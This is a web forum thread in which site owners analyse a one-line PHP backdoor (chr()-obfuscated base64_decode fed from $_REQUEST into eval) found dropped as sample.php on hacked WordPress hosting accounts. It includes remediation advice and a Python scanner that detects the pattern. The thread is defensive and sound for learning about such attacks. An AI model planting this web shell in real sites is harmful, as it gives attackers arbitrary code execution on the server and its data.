Attack Script via email?

Sounds odd that Amazon would go to the trouble of the "$a = " when all they need to do is
base64_decode($_REQUEST[sam])

And why REQUEST (both POST and GET) ?

Do you know what “sam” is?

surface to air missile?

Google showed it to be Wordpress ‘simple ads manager.’

Also brought up

I took a quick look through Contact 7 and found no “sam”.

“simple ad manager” is likely the vulnerable script.

Seeing as

IMHO it is time to delete that plugin at least until it gets patched.

And if a backdoor has been uploaded to your site, time to backup your database and do a thorough replacement of all folders and files.

Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.

What is the PHP chr function used for? What could they gain? I don’t have proprietary information or anything. And I really do not understand this lead … http://www.hackingwithphp.com/4/7/3/converting-to-and-from-ascii

In this case it is being used to make base64_decode not be easily noticeable.

As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?

If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.

Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.

That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER I put on the URL in the ‘sam’ variable and execute it. Whatever it is." sam = “unlink(index.php)”? Blow up your index file. Dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.

Agreed. But not knowing where “sam” is coming from, until determined what to do?

I’m thinking adding a DEFINE for “sam” as a CONSTANT into the config file might help.

I got several of these emails and went back and looked to see if all of them were looking for ‘sam.’ One was not. It was

<?php =chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(());

Okay, I run multiple sites for clients and I just

  1. deleted the Wordpress install
  2. used cPanel to protect the directory
  3. Deleted all files in the base directory
  4. waited (I have been having problems with my host’s cpanel directory-password protection option)

I just re-checked the site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));
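A small defender-side scanner for the pattern discussed in this thread (chr() chains hiding a decoder name, then eval() fed from request input), written here as an added example rather than code from any post: it folds chr() chains back into the string they build, notices a variable that holds a decoder name and is then called as a function, and flags eval() over $_REQUEST/$_GET/$_POST/$_COOKIE. The file contents below are constructed to mirror the one-line sample.php quoted above.

```python
import re

# Constructed sample mirroring the one-line backdoor quoted in this thread
# (the dropped "sample.php"); not taken from any real server.
SAMPLE_PHP = (
    "<?php\n"
    "$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95)"
    ".chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);\n"
    "eval($a($_REQUEST[sam]));\n"
)
BENIGN_PHP = "<?php\n$greeting = 'hello';\necho $greeting;\n"

# A run of chr(n) calls joined with PHP's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*")
CHR_NUM = re.compile(r"chr\(\s*(\d+)\s*\)")
# $var = 'literal'  (matched after chr() chains have been folded into literals)
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
# eval( ... $_REQUEST / $_GET / $_POST / $_COOKIE ... ) within one statement
EVAL_ON_INPUT = re.compile(r"\beval\s*\([^;]*\$_(?:REQUEST|GET|POST|COOKIE)\b")
DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}


def chain_to_string(chain: str) -> str:
    """Turn chr(98).chr(97)... back into the string it builds."""
    return "".join(chr(int(n)) for n in CHR_NUM.findall(chain))


def deobfuscate(src: str) -> str:
    """Replace every chr() chain with an equivalent single-quoted PHP literal."""
    def to_literal(m: re.Match) -> str:
        text = chain_to_string(m.group(0)).replace("\\", "\\\\").replace("'", "\\'")
        return "'" + text + "'"
    return CHR_CHAIN.sub(to_literal, src)


def scan(src: str) -> list[str]:
    """Return findings for one PHP file; an empty list means nothing matched."""
    findings = []
    clean = deobfuscate(src)
    if clean != src:
        findings.append("chr() chains used to build strings (name-hiding obfuscation)")
    for var, value in VAR_ASSIGN.findall(clean):
        if value in DECODERS and re.search(r"\$%s\s*\(" % re.escape(var), clean):
            findings.append(f"${var} holds {value!r} and is called as a function")
    if EVAL_ON_INPUT.search(clean):
        findings.append("eval() fed directly from request input")
    return findings


if __name__ == "__main__":
    for name, src in (("sample.php", SAMPLE_PHP), ("benign.php", BENIGN_PHP)):
        print(name, "->", scan(src) or "clean")
```

Run it over each PHP file under the web root to list the ones worth quarantining; a hit on the eval() check alone is enough to treat the file as a backdoor.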

So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)

Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to a high volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.

Wait… this code was in a file that you didn’t create, sitting on your server?

Contact your hosting company again. Tell them their server’s been breached, and they need to do a complete system sweep on all accounts on the box.

Yes, I’m live-chatting with them at this moment. 70% of my client sites have this weird sample.php file on them.

Yes, it could very well be a shell with group affecting every sharing site and not only your site in particular.

The host really needs to know this.

I told the live-chat support person "I am talking with my tech guy and he says my hosting service needs to do a complete system sweep on all accounts on the box? Is this correct?" He said he’s requesting a complete scan of that server.

Switch hosts, imo. That’s crazy.

Just thinking a bit on this.

Might it not be the shared server host but you?

i.e. Are all these clients on the same server?
Have you scanned your machine to make sure you aren’t FTP-ing the payload?
Are you sure your password is strong?
